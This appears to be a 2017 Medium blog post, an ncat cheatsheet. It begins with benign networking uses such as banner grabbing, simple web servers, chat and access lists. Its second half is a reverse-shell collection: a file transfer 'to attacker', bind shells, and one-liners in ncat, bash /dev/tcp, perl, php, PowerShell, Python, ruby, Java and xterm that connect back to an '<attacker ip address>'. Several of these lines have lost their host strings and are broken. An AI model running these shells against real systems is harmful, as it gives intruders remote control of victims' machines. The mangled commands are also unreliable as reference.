Ncat Cheatsheet

Dec 21, 2017 · 3 min read
ncat — Concatenate and redirect sockets

ncat [ <OPTIONS> ...] [ <hostname> ] [ <port> ]

Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat 80
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Tue, 19 Dec 2017 20:01:10 GMT
Content-Type: text/html
Content-Length: 178
Connection: close

<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>

SSL Banner Grab

printf "GET / HTTP/1.0\r\n\r\n" | ncat 443 --ssl
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 19 Dec 2017 20:01:59 GMT
Content-Type: text/html
Content-Length: 28379
Last-Modified: Tue, 19 Dec 2017 15:31:41 GMT
Connection: close
ETag: "5a3930dd-6edb"
Accept-Ranges: bytes

<!DOCTYPE html>
<html lang="en">

Simple Web Server

echo '<html><body>This is ncat webserver</body></html>' > stuff.html
ncat -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat stuff.html"

Once the ncat command is running navigate to web browser and point it to localhost.

Accept multiple requests

ncat --keep-open -l -p 8080 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/stuff.html"

A Better HTTP Server

There’s a neat Lua script that takes advantage of ncat’s ability to interact with the language. The script can be found here. Try saving it to /tmp/httpd.lua

Navigate to a directory with .html files in it, and run the following command.

ncat -l -p 8080 --lua-exec /tmp/httpd.lua --keep-open

Unwrap SSL Connections


Listen on port 6666 as a plain text server. Upon connection, connect to using SSL and forward client / server traffic. It also saves the full session to out.log for later analysis.

ncat -l -p 6666 -c 'ncat --ssl 443' --keep-open -o out.log


Grab our remote IP address by using an HTTP connection to localhost:6666, which handles the connection to using SSL.

curl 'http://localhost:6666?format=json' -H 'Host:'

Connect two incoming connections

ncat -l -p 8080 -c 'ncat -l -p 9090'

Connect two listening servers

This can have some very interesting results.

ncat localhost 8080 -c 'ncat localhost 9090'

For more, check out our pivoting cheatsheet.


ncat -t 23

Simple Chat


ncat -l 1234 --chat


ncat localhost 1234

Copy Files with UDP


ncat -l 6666 --udp


ncat -udp localhost 6666 <

Access Controls

Whitelist IPs

ncat -l -p 8080 --allow

Whitelist from file

Hosts should be separated by new lines

ncat -l -p 8080 --allowfile hosts

Blacklist IPs

ncat -l -p 8080 --deny,

Blacklist IPs from file

Hosts should be separated by new lines

ncat -l -p 8080 --denyfile hosts

File Transfer with SSL

Reverse file transfer to attacker


ncat -l -p 6666 --ssl > outputfile


ncat --ssl --send-only <attacker ip> 6666 < /bin/ncat

File send w/ Sender listening


ncat -l -ssl -p 6666 --send-only < /bin/ncat


ncat localhost 6666 --ssl > outputfile

Bind Shell


ncat -l 6666 -e /bin/sh


ncat -l 6666 -e cmd

Reverse Shell


ncat <attacker ip address> 6666 -e /bin/sh


ncat -l -p 6666

Victim machine doesn’t have ncat?


bash -i >& /dev/tcp/<attacker ip address>/6666 0>&1


perl -e 'use Socket;$i="";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


php -r '$sock=fsockopen("",6666);exec("/bin/sh -i <&3 >&3 2>&3");'


$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("<attacker ip address"),<listening port>);$client = New-Object System.Net.Sockets.UDPClient(53);[byte[]]$bytes = 0..65535|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes('PS> ');$client.Send($sendbytes,$sendbytes.Length,$endpoint);while($true){;$receivebytes = $client.Receive([ref]$endpoint);$returndata = ([text.encoding]::ASCII).GetString($receivebytes);$sendback = (iex $returndata 2>&1 | Out-String );$sendbytes = ([text.encoding]::ASCII).GetBytes($sendback);$client.Send($sendbytes,$sendbytes.Length,$endpoint)};$client.Close()

Python 2.7 and 3

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker ip address>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);

ProTip: This may become a lot easier on Windows and OSX hosts in the future if Microsoft adds Python as a language for Excel


ruby -rsocket -e'"",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


nc -e /bin/sh 6666


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you ( on TCP port 6001.

xterm -display

We need to modify /etc/X11/Xwrapper.config and change the allowed_users line to look like this. This file often gets overwritten on updates. After the file has been saved, restart the X11 login manager.


To catch the incoming xterm, start an X-Server (:1 — which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):

Xnest -ac :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip


More From Medium

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade